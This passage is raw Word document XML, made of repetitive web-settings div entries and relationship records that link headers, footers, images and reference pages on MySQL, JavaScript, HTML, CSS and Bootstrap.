        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2102406749">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2103138157">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2103336878">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2103451594">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2104256647">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2105571843">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2105762379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108697314">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108846824">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2109228917">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2111391793">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2111852036">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2112434298">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2112507673">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2113358917">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2114125974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2116095005">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2116511769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2116821846">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2117748965">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2119254840">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2120447472">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2120756781">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2122531032">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2124499649">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2124614107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2124959028">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2128312162">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2128353839">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2128965718">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2131194535">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2131898104">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2131971366">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2132162062">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2132357289">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2132703352">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2134713766">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2135827715">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2138066715">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2139181785">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2140221967">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2141223306">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2141411602">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2143033843">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144620309">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144807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ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Glossary/JavaScript" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.tmp"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.tmp"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ajpdsoft.com/modules.php?name=Encyclopedia&amp;op=content&amp;tid=831" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpeg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/JavaScript" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Prototype-based" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.maestrosdelweb.com/editorial/introcss/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.tmp"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.tmp"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.tmp"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpeg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/><Relationship Id="rId115"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5.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.tmp"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.tmp"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.tmp"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ftp.tcrc.edu.tw/MySQL/doc/refman/5.0/es/features.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Glossary/HTML" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.4rsoluciones.com/blog/bootstrap-el-versatil-framework-de-twitter-2/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.tmp"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpeg"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId8" 